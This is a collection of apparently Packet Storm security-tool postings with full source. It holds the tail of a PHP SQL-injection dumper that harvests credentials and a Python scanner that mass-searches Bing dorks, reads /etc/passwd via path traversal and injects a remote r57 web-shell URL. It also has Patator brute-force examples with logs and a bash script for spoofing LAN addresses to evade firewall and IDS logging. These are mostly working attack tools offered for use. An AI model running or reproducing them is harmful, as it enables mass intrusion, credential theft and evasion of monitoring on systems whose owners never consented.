curl_multi_add_handle($init,$curl[$i]); } do{curl_multi_exec($init,$active);usleep(11);}while($active>0); foreach($curl as $cid => $page) { $content[$cid] = curl_multi_getcontent($page); curl_multi_remove_handle($init,$page); if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$content[$cid])) { exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); } elseif(preg_match("#403 Forbidden#si",$content[$cid])) { exit("[-]Fail -> 403 Forbidden\n"); } preg_match($regex,$content[$cid],$veri); if($yaz == TRUE) { if(!empty($veri[1]) && preg_match("/[a-zA-Z0-9]:[a-zA-Z0-9]/si",$veri[1])) { $x++; echo "[$x]$veri[1]\n"; ob_flush();flush(); if($kaydet == TRUE && $file != NULL) { $fopen = fopen($file,'ab'); fwrite($fopen,trim($veri[1])."\r\n"); fclose($fopen); } } } else { $veriler[] = $veri[1]; } } } return $veriler; } function __hexEncode($string) { $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; } function __replace($text) { $text = str_replace("<","<",$text); $text = str_replace(">",">",$text); return $text; } function __dumpsave($file,$text) { $fp = fopen($file,'ab'); fwrite($fp,$text); fclose($fp); return true; } function __parse($site) { $site = explode("/",$site); $site = $site[2]; return $site; } ?> Download: http://packetstormsecurity.com/files/download/121491/sqlinjecter.txt Source: Multithreaded SQL Injector ? Packet Storm

This is a python script for searching Bing for sites that may have local and remote file inclusion vulnerabilities. Authored by:miyachung Systems | unix ################################################## # Bing LFI-RFI Searcher # Coded by Miyachung # Janissaries.Org # Miyachung@hotmail.com ################################################## import threading import urllib2,urllib,socket import re import time import sys socket.setdefaulttimeout(5) def dorker(url,limit,shell): try: regex = re.compile("h3><a href=\"(.*?)\" h=") path = "../../../../../../../../../../../../../../etc/passwd" pathn = "../../../../../../../../../../../../../../etc/passwd%00" conn = urllib2.urlopen(url) data = conn.read() links= regex.findall(data) for link in links: link = link.strip() if re.search("=",link) and link.find("youtube") == -1 and link.find ("forum") == -1 and link.find("google") == -1 and link.find("viewtopic") == -1 and link.find("showthread") == -1 and link.find("blog") == -1 and link.find("yahoo") == -1: link = link.split('=') link = link[0]+"=" check= urllib2.urlopen(link+path,None,3).read() if re.search("root:x",check): a = "######################################################### \r\n" a+= "[+]"+link+" /etc/passwd readed without null byte\r\n" a+= "[+]read -> "+link+path+"\r\n" a+= "[+]coded by miyachung\r\n" print a + "#########################################################" kaydet(a) else: check = urllib2.urlopen(link+pathn,None,3).read() if re.search("root:x",check): a = "#########################################################\r\n" a += "[+]"+link+" /etc/passwd readed with null byte!\r\n" a += "[+]read -> "+link+pathn+"\r\n" a += "[+]coded by miyachung\r\n" print a + "#########################################################" kaydet(a) else: print link+" hasn't got lfi vulnerability" checkrfi = urllib2.urlopen(link+shell,None,3).read() if re.search("safe_mode",checkrfi): a = "#########################################################\r\n" a+= "[+]remote file include vulnerability works!\r\n" a+= "[+]shell -> "+link+shell+"\r\n" a+= "[+]coded by miyachung\r\n" print a + "#########################################################" kaydet(a) else: print link+" hasn't got rfi vulnerability" except urllib2.URLError: print link+" urlerror" pass except urllib2.HTTPError: print link+" httperror" pass except socket.timeout: print link+" timeout" pass except: pass limit.release() def kaydet(yazi): ac = open('results.txt','ab') ac.write(yazi) ac.close() class Exploiter: def main(self,dorks,thread,shell): for dork in open(dorks): dork = dork.strip() i = 1 limit = threading.BoundedSemaphore(value=thread) tasks = [] while i <= 451: limit.acquire() th = threading.Thread(target=dorker,args=("http://www.bing.com/ search?q="+urllib.quote_plus(dork)+"&count=50&first="+str (i)+"&FORM=PERE",limit,shell,)) tasks.append(th) th.start() i += 50 for t in tasks: t.join() try: exploit = Exploiter() exploit.main(sys.argv[1],int(sys.argv[2]),"http://www.xfocus.net/tools/200608/ r57.txt?") except IndexError: print "# Bing LFI-RFI Searcher" print "# Coded by Miyachung" print "# Janissaries.Org" print "Usage: python searcher.py DORKLISTFILE THREAD" print "Examp: python searcher.py dorks.txt 10" Download: http://packetstormsecurity.com/files/download/121590/binglfirfi.txt Source: Bing LFI / RFI Scanner ? Packet Storm

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. When Medusa, Hydra or other brute-force tools fail to do what you want, Patator might be what you need. Authored by:Sebastien Macke Changes : Various new modules. Multiple improvements, bug fixes, and additions. Currently it supports the following modules: * ftp_login : Brute-force FTP * ssh_login : Brute-force SSH * telnet_login : Brute-force Telnet * smtp_login : Brute-force SMTP * smtp_vrfy : Enumerate valid users using the SMTP VRFY command * smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command * finger_lookup : Enumerate valid users using Finger * http_fuzz : Brute-force HTTP/HTTPS * pop_login : Brute-force POP * pop_passd : Brute-force poppassd (not POP3) * imap_login : Brute-force IMAP * ldap_login : Brute-force LDAP * smb_login : Brute-force SMB * smb_lookupsid : Brute-force SMB SID-lookup * vmauthd_login : Brute-force VMware Authentication Daemon * mssql_login : Brute-force MSSQL * oracle_login : Brute-force Oracle * mysql_login : Brute-force MySQL * mysql_query : Brute-force MySQL queries * pgsql_login : Brute-force PostgreSQL * vnc_login : Brute-force VNC * dns_forward : Brute-force DNS * dns_reverse : Brute-force DNS (reverse lookup subnets) * snmp_login : Brute-force SNMPv1/2 and SNMPv3 * unzip_pass : Brute-force the password of encrypted ZIP files * keystore_pass : Brute-force the password of Java keystore files The name "Patator" comes from http://www.youtube.com/watch?v=xoBkBvnTTjo Patator is NOT script-kiddie friendly, please read the README inside patator.py before reporting. @lanjelot FTP : User enumeration on a too verbose server $ patator.py ftp_login host=10.0.0.1 user=FILE0 password=qsdf 0=logins.txt -x ignore:mesg='Login incorrect.' 22:27:29 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 22:27 EST 22:27:29 patator INFO - 22:27:29 patator INFO - code size | candidate | num | mesg 22:27:29 patator INFO - ---------------------------------------------------------------------- 22:27:30 patator INFO - 530 18 | root | 1 | Permission denied. 22:27:31 patator INFO - 230 17 | ftp | 13 | Login successful. 22:27:34 patator INFO - 530 18 | admin | 23 | Permission denied. 22:27:34 patator INFO - 530 18 | oracle | 31 | Permission denied. 22:28:02 patator INFO - 530 18 | test | 179 | Permission denied. 22:28:21 patator INFO - 230 17 | anonymous | 283 | Login successful. 22:28:26 patator INFO - 530 18 | ftpuser | 357 | Permission denied. 22:28:41 patator INFO - 530 18 | nobody | 402 | Permission denied. ... HTTP : Brute-force phpMyAdmin logon $ http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1?=en' 0=combos.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf 10:55:50 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 10:55 EST 10:55:50 patator INFO - 10:55:50 patator INFO - code size:clen | candidate | num | mesg 10:55:50 patator INFO - ---------------------------------------------------------------------- 10:55:50 patator INFO - 200 8209:7075 | root: | 22 | HTTP/1.1 200 OK 10:55:51 patator INFO - 200 3838:2566 | root:p@ssw0rd | 44 | HTTP/1.1 200 OK ^C 10:55:52 patator INFO - Hits/Done/Skip/Fail/Size: 2/125/0/0/2342, Avg: 47 r/s, Time: 0h 0m 2s 10:55:52 patator INFO - To resume execution, pass --resume 12,13,12,13,12,12,13,13,13,12 Payload #22 was a false positive: $ cat /tmp/qsdf/22_200_8209\:7075.txt ... <div class="error">Login without a password is forbidden by configuration (see AllowNoPassword)</div> SNMPv3 : Find valid usernames $ snmp_login host=10.0.0.1 version=3 user=FILE0 0=logins.txt -x ignore:mesg=unknownUserName 17:51:06 patator INFO - Starting Patator v0.5 17:51:06 patator INFO - 17:51:06 patator INFO - code size | candidate | num | mesg 17:51:06 patator INFO - ---------------------------------------------------------------------- 17:51:11 patator INFO - 0-0 11 | robert | 55 | wrongDigest 17:51:12 patator INFO - Progress: 20% (70/345) | Speed: 10 r/s | ETC: 17:51:38 (00:00:26 remaining) 17:51:33 patator INFO - 0-0 11 | myuser | 311 | wrongDigest 17:51:36 patator INFO - Hits/Done/Skip/Fail/Size: 2/345/0/0/345, Avg: 11 r/s, Time: 0h 0m 30s SNMPv3 : Find valid passwords $ snmp_login host=10.0.0.1 version=3 user=robert auth_key=FILE0 0=passwords_8+.txt -x ignore:mesg=wrongDigest 17:52:15 patator INFO - Starting Patator v0.5 17:52:15 patator INFO - 17:52:15 patator INFO - code size | candidate | num | mesg 17:52:15 patator INFO - ---------------------------------------------------------------------- 17:52:16 patator INFO - 0-0 69 | password123 | 16 | Linux thug 2.6.36-gentoo #5 SMP Fri Aug 12 14:49:51 CEST 2011 i686 17:52:17 patator INFO - Hits/Done/Skip/Fail/Size: 1/50/0/0/50, Avg: 38 r/s, Time: 0h 0m 1s DNS : Forward lookup $ dns_forward name=FILE0.hsc.fr 0=names.txt -x ignore:code=3 03:18:46 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 03:18 PMT 03:18:46 patator INFO - 03:18:46 patator INFO - code size | candidate | num | mesg 03:18:46 patator INFO - ---------------------------------------------------------------------- 03:18:46 patator INFO - 0 41 | www | 4 | NOERROR [www.hsc.fr. IN A 217.174.211.25] 03:18:46 patator INFO - 0 81 | mail | 32 | NOERROR [mail.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33] 03:18:46 patator INFO - 0 44 | webmail | 62 | NOERROR [webmail.hsc.fr. IN A 192.70.106.95] 03:18:46 patator INFO - 0 93 | test | 54 | NOERROR [hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600] 03:18:46 patator INFO - 0 40 | wap | 66 | NOERROR [wap.hsc.fr. IN A 192.70.106.33] 03:18:46 patator INFO - 0 85 | extranet | 131 | NOERROR [extranet.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33] 03:18:46 patator INFO - 0 81 | news | 114 | NOERROR [news.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33] 03:18:46 patator INFO - 0 93 | mailhost | 137 | NOERROR [mailhost.hsc.fr. IN A 192.70.106.33][mailhost.hsc.fr. IN AAAA 2001:7a8:1155:2::abcd] 03:18:46 patator INFO - 0 47 | lists | 338 | NOERROR [lists.hsc.fr. IN MX 10 itesec.hsc.fr.] 03:18:46 patator INFO - 0 93 | fr | 319 | NOERROR [hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600] 03:18:47 patator INFO - 0 40 | gl | 586 | NOERROR [gl.hsc.fr. IN A 192.70.106.103] Records ------------------------------------------ extranet.hsc.fr. IN CNAME itesec.hsc.fr. gl.hsc.fr. IN A 192.70.106.103 hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600 itesec.hsc.fr. IN A 192.70.106.33 lists.hsc.fr. IN MX 10 itesec.hsc.fr. mail.hsc.fr. IN CNAME itesec.hsc.fr. mailhost.hsc.fr. IN A 192.70.106.33 mailhost.hsc.fr. IN AAAA 2001:7a8:1155:2::abcd news.hsc.fr. IN CNAME itesec.hsc.fr. wap.hsc.fr. IN A 192.70.106.33 webmail.hsc.fr. IN A 192.70.106.95 www.hsc.fr. IN A 217.174.211.25 Hostmap ------------------------------------------ mailhost.hsc.fr 2001:7a8:1155:2::abcd mailhost.hsc.fr 192.70.106.33 wap.hsc.fr 192.70.106.33 itesec.hsc.fr 192.70.106.33 extranet.hsc.fr mail.hsc.fr news.hsc.fr webmail.hsc.fr 192.70.106.95 gl.hsc.fr 192.70.106.103 www.hsc.fr 217.174.211.25 Domains ------------------------------------------ hsc.fr 10 Networks ----------------------------------------- 2001:7a8:1155:2::abcd 192.70.106.x 217.174.211.25 03:18:53 patator INFO - Hits/Done/Skip/Fail/Size: 11/1000/0/0/1000, Avg: 133 r/s, Time: 0h 0m 7s Also notice that test.hsc.fr. is the start of a new zone because we got NOERROR and no IP address. DNS : Reverse lookup two netblocks owned by Google $ dns_reverse host=NET0 0=216.239.32.0-216.239.47.255,8.8.8.0/24 -x ignore:code=3 -x ignore:fgrep!=google.com -x ignore:fgrep=216-239- 03:24:22 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 03:24 PMT 03:24:22 patator INFO - 03:24:22 patator INFO - code size | candidate | num | mesg 03:24:22 patator INFO - ---------------------------------------------------------------------- 03:24:22 patator INFO - 0 46 | 216.239.32.10 | 11 | NOERROR [216.239.32.10 IN PTR ns1.google.com.] 03:24:22 patator INFO - 0 45 | 216.239.32.11 | 12 | NOERROR [216.239.32.11 IN PTR ns.google.com.] 03:24:22 patator INFO - 0 48 | 216.239.32.15 | 16 | NOERROR [216.239.32.15 IN PTR time1.google.com.] 03:24:23 patator INFO - 0 47 | 216.239.33.5 | 262 | NOERROR [216.239.33.5 IN PTR proxy.google.com.] 03:24:23 patator INFO - 0 47 | 216.239.33.12 | 269 | NOERROR [216.239.33.12 IN PTR dns1.google.com.] 03:24:23 patator INFO - 0 51 | 216.239.33.22 | 279 | NOERROR [216.239.33.22 IN PTR transfer.google.com.] 03:24:23 patator INFO - 0 50 | 216.239.33.20 | 277 | NOERROR [216.239.33.20 IN PTR esc-out.google.com.] 03:24:23 patator INFO - 0 46 | 216.239.34.10 | 523 | NOERROR [216.239.34.10 IN PTR ns2.google.com.] 03:24:23 patator INFO - 0 48 | 216.239.34.15 | 528 | NOERROR [216.239.34.15 IN PTR time2.google.com.] ^C Records ------------------------------------------ 216.239.32.10 IN PTR ns1.google.com. 216.239.32.11 IN PTR ns.google.com. 216.239.32.15 IN PTR time1.google.com. 216.239.33.12 IN PTR dns1.google.com. 216.239.33.20 IN PTR esc-out.google.com. 216.239.33.22 IN PTR transfer.google.com. 216.239.33.5 IN PTR proxy.google.com. 216.239.34.10 IN PTR ns2.google.com. 216.239.34.15 IN PTR time2.google.com. Hostmap ------------------------------------------ ns1.google.com 216.239.32.10 ns.google.com 216.239.32.11 time1.google.com 216.239.32.15 proxy.google.com 216.239.33.5 dns1.google.com 216.239.33.12 esc-out.google.com 216.239.33.20 transfer.google.com 216.239.33.22 ns2.google.com 216.239.34.10 time2.google.com 216.239.34.15 Domains ------------------------------------------ google.com 9 Networks ----------------------------------------- 216.239.32.x 216.239.33.x 216.239.34.x 03:24:29 patator INFO - Hits/Done/Skip/Fail/Size: 9/872/0/0/4352, Avg: 115 r/s, Time: 0h 0m 7s 03:24:29 patator INFO - To resume execution, pass --resume 91,75,93,73,84,95,94,95,83,89 ZIP : Crack a password-protected ZIP file (older pkzip encryption used not to be supported in JtR) $ unzip_pass zipfile=challenge1.zip password=FILE0 0=rockyou.dic -x ignore:code!=0 10:54:29 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 10:54:29 PMT 10:54:29 patator INFO - 10:54:29 patator INFO - code size | candidate | num | mesg 10:54:29 patator INFO - ---------------------------------------------------------------------- 10:54:30 patator INFO - 0 82 | love | 387 | 0 [82] No errors detected in compressed data of challenge1.zip. ^C 10:54:31 patator INFO - Hits/Done/Skip/Fail/Size: 1/1589/0/0/5000, Avg: 699 r/s, Time: 0h 0m 2s 10:54:31 patator INFO - To resume execution, pass --resume 166,164,165,166,155,158,148,158,155,154 SSH : Time-based user enumeration (using git version) $ python -c "print('A'*5000)" > /tmp/As.txt $ ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=@/tmp/As.txt -x ignore:time=0-3.5 16:12:39 patator INFO - Starting Patator v0.6-beta (http://code.google.com/p/patator/) at 2013-07-13 16:12 EST 16:12:39 patator INFO - 16:12:39 patator INFO - code size time | candidate | num | mesg 16:12:39 patator INFO - ---------------------------------------------------------------------- 16:12:53 patator INFO - 1 22 13.643 | root | 1 | Authentication failed. 16:12:57 patator INFO - 1 22 15.404 | support | 18 | Authentication failed. 16:12:58 patator INFO - 1 22 13.315 | testuser | 25 | Authentication failed. 16:13:06 patator INFO - 1 22 7.377 | michael | 38 | Authentication failed. ... Download: http://packetstormsecurity.com/files/download/122392/patator_v0.5.py.txt Source: patator - Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. - Google Project Hosting

This is a simple bash script that makes spoofing a given host on a LAN easier in Linux. Authored by Vittorio Milazzo Systems | linux , unix #!/bin/bash # Version: 0.1 (24/07/2013) # Author: Vittorio Milazzo - vittorio.milazzo at gmail.com # # Notes: Bash script that permit to spoof Lan connections # and deceive firewall,proxy,IDS/NIDS traffic logging. # # Prerequisite packages: macchanger, netfilter # ============ # Intended use # ============ # The script purpose is to test how is possible to deceive firewall/proxy/NIDS logging in a local network. # ========== # Disclaimer # ========== # The author published this script and the information under the condition that them # will not be used for to bring to himself or others a profit or to bring to others damage. # The author is not responsible for any damage or losses of any kind caused by the use or # misuse of the script and from the information contained therein. # Author is not liable in any case of damage, including direct, indirect, incidental, # consequential loss of business profits or special damages. # ======= # Details # ======= # Three-way handshake completition: # This script assign ip alias ($spoof_ip) to network interface card, and change mac- address # using macchanger. After wich, iptables SNAT will send outgoing packets with ip alias address # and mac-address that we have changed. Hosts that will receive SYN spoofed packets, # will response with ACK flags to our ip alias (so packets will reach us), and SYN/ ACK packets will be send # from our ip alias to target hosts. # # BE CAREFULL: # When spoofed ip/mac address is an alive host in our Lan, it may happen that both (we and spoofed host) # will lose some packets and some established connections will drop. clear BANNER="trickfire v.0.1: Spoofing Lan connection - Firewall and IDS/NIDS deception logging" ######################### # 1.) NETWORK VARIABLES # ######################### # Set Lan default gateway ip address router="192.168.0.200" # Set network interface card used for spoofing interface="eth0" # Our real ip address real_ip=`ifconfig eth0 | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1}';` # Our authentic mac address real_mac="c8:0a:a9:c0:49:a4" ########################## # 2.) SPOOFING VARIABLES # ########################## # # VARIANTS: # # A.) SPOOF LAN CONNECTION AND DECEIVE INTERNET TRAFFIC LOGGING # # For deceive firewall/proxy or IDS/NIDS logging, you need to send spoofed packets to their. # # But if you are not sure about firewall or Nids ip address, or you don't know if in Lan there are some other NIDS # or sniffer with ip address on a different class, will be better to send spoofed packets to all (0/0). # This setting will permit to spoof connection vs all Lan hosts too. # # # B.) DECEIVE ONLY INTERNET TRAFFIC LOGGING # # Otherwise, if in your network is not present a proxy server or IDS/NIDS, or you are not interested # to test spoofing Lan connections, you can deceive Firewall Internet traffic logging specifying your # Lan class ID with net prefix. (Ex: lan_id="192.168.0.0/24"). # With this option, iptables SNAT doesn't will send spoofed packets on entire Lan network ( ! -d $lan_id ), # and spoofed packets will arrive (and will log) only from default gateway (firewall or router). # # If you will use this setting, remember to comment/uncomment too appropriate iptables command below (in functions section). lan_id="0/0" # Ip address that you want to spoof spoof_ip="192.168.0.216" # Mac address that you want to spoof spoof_mac="ec:9a:74:64:f6:33" ################# # 3.) FUNCTIONS # ################# enable_spoof () { ifconfig $interface down macchanger -m $spoof_mac $interface >/dev/null ifconfig $interface:1 $spoof_ip ifconfig $interface up # A.) SPOOF LAN CONNECTION AND DECEIVE INTERNET TRAFFIC LOGGING # Use this if you have set variable lan_id="0/0" # iptables -t nat -I POSTROUTING -d $lan_id -j SNAT --to $spoof_ip # B.) DECEIVE ONLY INTERNET TRAFFIC LOGGING # Use this if you have set variable lan_id="x.x.x.x/net_prefix" # (and comment iptables command above). # #iptables -t nat -I POSTROUTING ! -d $lan_id -j SNAT --to $spoof_ip # Block incoming connection (to avoid to be detected by possible listening services) iptables -I INPUT -i $interface -d $spoof_ip -p tcp --syn -m state --state NEW -j DROP iptables -I INPUT -i $interface -d $spoof_ip -p udp -m state --state NEW -j DROP route add default gw $router } disable_spoof () { ifconfig $interface down >/dev/null macchanger -m $real_mac $interface >/dev/null ifconfig $interface:1 down 2>/dev/null iptables -t nat -F ifconfig $interface up echo -e "\033[0;32mDefault gateway: $router\033[m" route add default gw $router } case "$1" in start) echo; echo -e "\033[31m$BANNER\033[m"; echo echo; echo -e "\033[31m- Spoofing started"; echo echo -e "\033[0;32mInterface: $interface\033[m" echo -e "\033[0;32mSpoofed ip: $spoof_ip\033[m" echo -e "\033[0;32mSpoofed mac address: $spoof_mac\033[m" echo enable_spoof echo exit 0 ;; stop) echo; echo -e "\033[31m$BANNER\033[m"; echo echo; echo -e "\033[31m- Spoofing stopped\033[m";echo echo -e "\033[31mBack to normal configuration:\033[m"; echo echo -e "\033[0;32mInterface: $interface\033[m" echo -e "\033[0;32mIp address: $real_ip\033[m" echo -e "\033[0;32mMac adress: $real_mac\033[m" disable_spoof echo exit 0 ;; *) echo echo -e " \033[31m#####################################################################\033[m" echo -e " \033[31m# trickfire v.0.1 #\033[m" echo -e " \033[31m# #\033[m" echo -e " \033[31m# Spoofing Lan connection - Firewall and IDS/NIDS deception logging #\033[m" echo -e " \033[31m# #\033[m" echo -e " \033[31m# Vittorio Milazzo - vittorio.milazzo at gmail.com #\033[m" echo -e " \033[31m#####################################################################\033[m" echo;echo -e "\033[36m1.) Change variables inside the script\033[m" echo;echo -e "\033[36m2.) Usage: ./trickfire.sh {start|stop}\033[m" echo exit 1 ;; esac exit 0 Download Link: http://packetstormsecurity.com/files/download/122544/trickfire.sh.txt Source: Trickfire Spoofing Script ? Packet Storm